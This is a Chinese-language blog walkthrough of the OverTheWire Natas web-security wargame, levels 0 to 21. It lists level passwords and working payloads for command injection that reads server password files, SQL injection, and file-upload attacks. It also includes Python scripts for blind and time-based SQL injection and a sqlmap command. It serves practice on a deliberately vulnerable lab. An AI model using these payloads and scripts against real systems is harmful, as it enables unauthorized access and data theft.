natas1-19
|
未分类

848 字
|
11 分钟
本文最后更新于87 天前,其中的信息可能已经过时,如有错误请发送邮件到big_fw@foxmail.com

http协议认证

  • 基本认证(Basic Authentication):在 RFC 7617 中进行了详细定义,客户端将用户名和密码以 username:password 的格式组合并进行 Base64 编码,然后在请求头的 Authorization 字段中以 Basic <编码后的字符串> 的形式发送给服务器。
  • 摘要认证(Digest Authentication):由 RFC 7616 规范,它使用哈希算法来避免密码明文传输,通过服务器和客户端之间的挑战 – 响应机制完成认证。
  • NTLM 认证:虽然不是标准的 HTTP 规范,但在 Windows 网络环境中广泛使用,有其特定的工作流程和消息格式。

curl

curl -i http://natas17.natas.labs.overthewire.org/index.php –basic -u natas17:EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC

sqlmap

sqlmap -u http://natas17.natas.labs.overthewire.org/index.php –auth-type=basic –auth-cred=natas17:EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC –dbms=mysql –data username=natas18 –level=5 –risk=3 –technique=T –dump –batch

natas0-1 :

查看源码
0nzCigAq7t2iALyvU9xcHlYN4MlkIwlq

natas1-2 :

f12 查看元素
TguMNxKo1DSa1tujBLuZJnDUlCcUAPlI

natas2-3:

访问 files 文件夹 中的user.txt
3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH

natas3-4:

robots文件


QryZXc2e0zahULdHrtHxzyYkj59kUxLQ

natas4-5:

添加 请求头

modheader
Referer http://natas5.natas.labs.overthewire.org/

0n35PkggAPm2zbEpOU802c0x0Msn1ToK

natas5-6:

修改cookie 中的认证参数 值为1

Cookie: _ga=GA1.1.1201777083.1737336658; _ga_RD0K2239G0=GS1.1.1737336657.1.1.1737338614.0.0.0; loggedin=1

0RoJwHdSKWFTYR5WuiAewauSuNaBXned

natas6-7:

访问文件 includes/secret.inc

includes/secret.inc “; } else { print “Wrong secret”; } } ?>

bmg8SvU1LizuWjx3y7xkNERkHxGre0GS

natas7-8:

文件包含

hint: password for webuser natas8 is in /etc/natas_webpass/natas8

xcoXLmzMkoIP9D7hlgPlh9XD7OgLAe5Q

natas8-9:

根据代码解码

from hex
reverse
from base64 “; } else { print “Wrong secret”; } } ?>

ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t

$apr1$p5hxEdIi$jDg7hmdch008hyW9lyEIr0:
ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t

natas9-10:

命令注入

a ; find / -user natas9 2>/dev/null
.
./.htaccess
./dictionary.txt
./index.php
./.htpasswd

读取 /etc/natas_webpass/natas10

t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu

/etc/natas_webpass/natas11


natas10-11:

限制命令注入,使用grep构造读取文件

.* /etc/natas_webpass/natas11 #
UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk

natas11-12:

根据代码 从cookie 把值传给showpassword 所在数组

值的构造 通过 xor 运算,可以进行逆运算获取key,用当前cookie 和 代码中写死的明文。

yZdkjAYZRd3R7tq7T5kXMjMJlOIkzDeB

document.cookie=”data=”

{"showpassword":"yes","bgcolor":"#ffffff"}
xor
base64 "no", "bgcolor"=>"#ffffff"); function xor_encrypt($in) { $key = ''; $text = $in; $outText = ''; // Iterate through each character for($i=0;$i

natas12-13:

后台没有校验文件名,文件上传
trbs5pCjCrkuSknBBKHhaBxq6Wm1j3LC

cat /etc/natas_webpass/natas13


natas13-14:

添加了图片校验,在包中添加gif的魔术字
z3UYcr4v4uBpeX8f7EZbMHlzK4UR2XtQ

1000) { echo "File is too big"; } else { if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { echo "The file $target_path has been uploaded"; } else{ echo "There was an error uploading the file, please try again!"; } } } else { ?>

cat /etc/natas_webpass/natas14

natas14-15:

sql注入,构造一个 or 1=1 条件为真 返回密码

添加 ?debug 参数来查看 $query 的内容
username=admin&password=admin” or 1=1 — –
SdqIqBsFcz3yotlNYErZSZwblkm0lrvx

'); mysqli_select_db($link, 'natas14'); $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\""; if(array_key_exists("debug", $_GET)) { echo "Executing query: $query
"; } if(mysqli_num_rows(mysqli_query($link, $query)) > 0) { echo "Successful login! The password for natas15 is
"; } else { echo "Access denied!
"; } mysqli_close($link); } else { ?>

natas15-16

布尔盲注,

a ” and ascii(substr(password,1,1))=ascii(‘h’) — –

” OR ascii(substr(password,1,1)) = ascii(‘h’) — – ‘);

This user exists. 判断值

mysqli_select_db($link, 'natas15'); $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\""; if(array_key_exists("debug", $_GET)) { echo "Executing query: $query
"; } $res = mysqli_query($link, $query); if($res) { if(mysqli_num_rows($res) > 0) { echo "This user exists.
"; } else { echo "This user doesn't exist.
"; } } else { echo "Error in query.
"; } mysqli_close($link); } else { ?>

import requests
url = "http://natas15.natas.labs.overthewire.org/index.php"
uu = ""     
head = {"Authorization": "Basic bmF0YXMxNTpTZHFJcUJzRmN6M3lvdGxOWUVyWlNad2Jsa20wbHJ2eA==",'Content-Type': 'application/x-www-form-urlencoded'}
s = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
for i in range(1,33):
for x in s:
p=f"username=natas16\" and ascii(substr(password,{i},1)) = ascii('{x}') -- -"
re = requests.post(url=url,data=p,headers=head)
print("."*i)
if "This user exists." in re.text:
uu+=x
print("[+]:",uu)
break
print(uu)

natas16-17:

命令注入和grep被进一步限制,使用 (grep ^x /etc/natas_webpass/natas17 )返回的值来判断文件中是否存在x。

grep -i \”$key\” dictionary.txt

grep -i \”African$(grep ^a /etc/natas_webpass/natas17) \” dictionary.txt

当$()中没有返回值 就会整个命令返回African,以此来判断进行布尔盲注
EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC

import requests
url="http://natas16.natas.labs.overthewire.org/index.php"
uu = "EqjHJbo7LFNb8vwhHb9s75hokh5TF0O"
head = {"Authorization": "Basic bmF0YXMxNjpoUGtqS1l2aUxRY3RFVzMzUW11WEw2ZURWZk1XNHNHbw==",'Content-Type': 'application/x-www-form-urlencoded'}
s = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
for i in range(1,33):
for x in s:
dd=uu+x
t = f"African$(grep ^{dd} /etc/natas_webpass/natas17)"
    p = {"needle":t}
    print("*"*i)

    re = requests.get(url=url,params=p,headers=head)

    if  not "African" in re.text:
        uu+=x
        print("[+]",uu)
        break
print(uu)

natas17-18

时间盲注

使用 like binary 语句 对password 的值进行枚举,进行时间盲注

SELECT * from users where username=”natas17 or 1=1 — -“

natas17″ and sleep(10) — –

natas17″ and if((ascii(substr(password,1,1)) =ascii(‘U’)), sleep(10), 3) — –

import time
use_time = time.time() – start_time
if use_time>5

natas18″ and password like binary “%a%” and sleep(5) — –

bKdVjyBlpxgD4DDbRG6ZLlCGgCJ

6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ

import requests
import string
import time
"""str = string.ascii_letters+string.digits"""
s = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
url = "http://natas17.natas.labs.overthewire.org/index.php"
f = ""
head = {"Authorization": "Basic bmF0YXMxNzpFcWpISmJvN0xGTmI4dndoSGI5czc1aG9raDVURjBPQw==","Content-Type": "application/x-www-form-urlencoded"}
for i in s:
p=f"username=natas18\" and password like binary \"%{i}%\" and sleep(2) -- -"
re = requests.post(url=url,data=p,headers=head)
print(re.status_code,re.elapsed.seconds)
if re.elapsed.seconds >= 2:
f+=i
print(f)
uu = ""
for i in range(1,33):
for x in s:
dd= uu+x
p=f"username=natas18\" and password like binary \"{dd}%\" and sleep(2) -- -"
re = requests.post(url=url, data=p, headers=head)
print(re.status_code, re.elapsed.seconds)
if re.elapsed.seconds >= 2:
uu+=x
print(uu)
break
# time.sleep(1)
print(uu)

natas18-19:
tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr

Username: natas19
Password: tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr

Username: natas20
Password: p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVyw

echo 123-admin | xxd -d | tr -d ‘ ‘| cut -d “:” -f 2 | grep -oP “[0-9a-z]{2,}(?=0a)”

Username: natas21
Password: BPhv63cKE1lkQl04cE5CuFTzXe15NfiH

文末附加内容
暂无评论

发送评论 编辑评论

 
 
 
 
 
 
 
  
  
  
   
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
  
上一篇
下一篇 
  推荐文章
dc01
 
hackmyvm-dc03
 
host主机头
 
密码保护:PivotAPI
 
hackmyvm-dc02
 
防火墙和AppLocker
 
处理pfx 文件
 
密码保护:apt
 
kerberos 认证
 
generic all 权限与利用